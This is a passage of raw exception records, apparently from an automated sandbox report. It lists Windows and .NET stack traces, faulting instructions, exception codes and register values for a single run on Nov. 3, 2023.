URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6a63540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6a6352ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6a710ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 77453072 registers.edi: 1974991376 registers.eax: 77453072 registers.ebp: 77453152 registers.edx: 1 registers.ebx: 8185500 registers.esi: 2147746133 registers.ecx: 312098352	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 113898596 registers.edi: 6412588 registers.eax: 113898596 registers.ebp: 113898676 registers.edx: 326 registers.ebx: 113898960 registers.esi: 2147746133 registers.ecx: 92093664	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x752f8926 RevokeBindStatusCallback+0x446 CreateURLMoniker-0x1418 urlmon+0x1c5f7 @ 0x752fc5f7 GetIDNFlagsForUri+0x1eb2 CreateIUriBuilder-0x8e7 urlmon+0x21ba9 @ 0x75301ba9 GetIDNFlagsForUri+0x19d4 CreateIUriBuilder-0xdc5 urlmon+0x216cb @ 0x753016cb GetIDNFlagsForUri+0x193d CreateIUriBuilder-0xe5c urlmon+0x21634 @ 0x75301634 GetIDNFlagsForUri+0xe85 CreateIUriBuilder-0x1914 urlmon+0x20b7c @ 0x75300b7c GetIDNFlagsForUri+0x12e3 CreateIUriBuilder-0x14b6 urlmon+0x20fda @ 0x75300fda CompareSecurityIds+0x207a GetClassFileOrMime-0x3330 urlmon+0x33246 @ 0x75313246 RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x752fd1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x752fd1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x752fd40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x752f991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x752f8d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6a63540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6a6352ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6a710ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 101239672 registers.edi: 1974991376 registers.eax: 101239672 registers.ebp: 101239752 registers.edx: 1 registers.ebx: 6295292 registers.esi: 2147746133 registers.ecx: 337573925	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x1b2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 fc 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x1b2e04 registers.r14: 243265160 registers.r15: 85336960 registers.rcx: 1224 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 243264416 registers.rsp: 243264136 registers.r11: 243268032 registers.r8: 2004779404 registers.r9: 0 registers.rdx: 1340 registers.r12: 243264776 registers.rbp: 243264272 registers.rdi: 86399696 registers.rax: 1781248 registers.r13: 86475616	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7e870d 0x7e84de 0x7e68bd 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7e8848 registers.esp: 4123284 registers.edi: 4123336 registers.eax: 0 registers.ebp: 4123348 registers.edx: 4663592 registers.ebx: 4124556 registers.esi: 41652108 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4d06a50 0x4d02b68 0x4d02619 0x4d02535 0x4d00bd3 0x7ef8c6 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d06a93 registers.esp: 4121844 registers.edi: 4122128 registers.eax: 0 registers.ebp: 4121852 registers.edx: 0 registers.ebx: 4124556 registers.esi: 42438132 registers.ecx: 43564276	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4d06a50 0x4d02b68 0x4d02619 0x4d0254d 0x4d00bd3 0x7ef8c6 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d06a93 registers.esp: 4121844 registers.edi: 4122128 registers.eax: 0 registers.ebp: 4121852 registers.edx: 0 registers.ebx: 4124556 registers.esi: 42438132 registers.ecx: 44870216	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4d06a50 0x4d02b68 0x4d02619 0x4d0254d 0x4d00bd3 0x7ef8c6 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d06a93 registers.esp: 4121844 registers.edi: 4122128 registers.eax: 0 registers.ebp: 4121852 registers.edx: 0 registers.ebx: 4124556 registers.esi: 42438132 registers.ecx: 42362680	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x7ef8c6 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 39 09 e8 72 12 9e 6c 89 85 ec fc ff ff 8d bd e4 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d00ee7 registers.esp: 4122232 registers.edi: 4123372 registers.eax: 0 registers.ebp: 4123408 registers.edx: 0 registers.ebx: 4124556 registers.esi: 4122944 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4d06a50 0x4d07d0e 0x4d07760 0x4d02535 0x4d013ad 0x7ef8c6 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d06a93 registers.esp: 4121804 registers.edi: 4122144 registers.eax: 0 registers.ebp: 4121812 registers.edx: 0 registers.ebx: 4124556 registers.esi: 41315892 registers.ecx: 43673560	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4d06a50 0x4d07d0e 0x4d07760 0x4d0254d 0x4d013ad 0x7ef8c6 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d06a93 registers.esp: 4121804 registers.edi: 4122144 registers.eax: 0 registers.ebp: 4121812 registers.edx: 0 registers.ebx: 4124556 registers.esi: 41315892 registers.ecx: 45023232	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4d06a50 0x4d07d0e 0x4d07760 0x4d0254d 0x4d013ad 0x7ef8c6 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d06a93 registers.esp: 4121804 registers.edi: 4122144 registers.eax: 0 registers.ebp: 4121812 registers.edx: 0 registers.ebx: 4124556 registers.esi: 41315892 registers.ecx: 46449648	1
__exception__ Nov. 3, 2023, 12:04 p.m.	stacktrace: 0x4d06a50 0x4d083d2 0x4d07fb0 0x4d02535 0x4d014af 0x7ef8c6 0x7ec787 0x7e6985 0x7e6496 0x7e3483 0x7e2ee8 0x7e2e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4d06a93 registers.esp: 4121868 registers.edi: 4122144 registers.eax: 0 registers.ebp: 4121876 registers.edx: 0 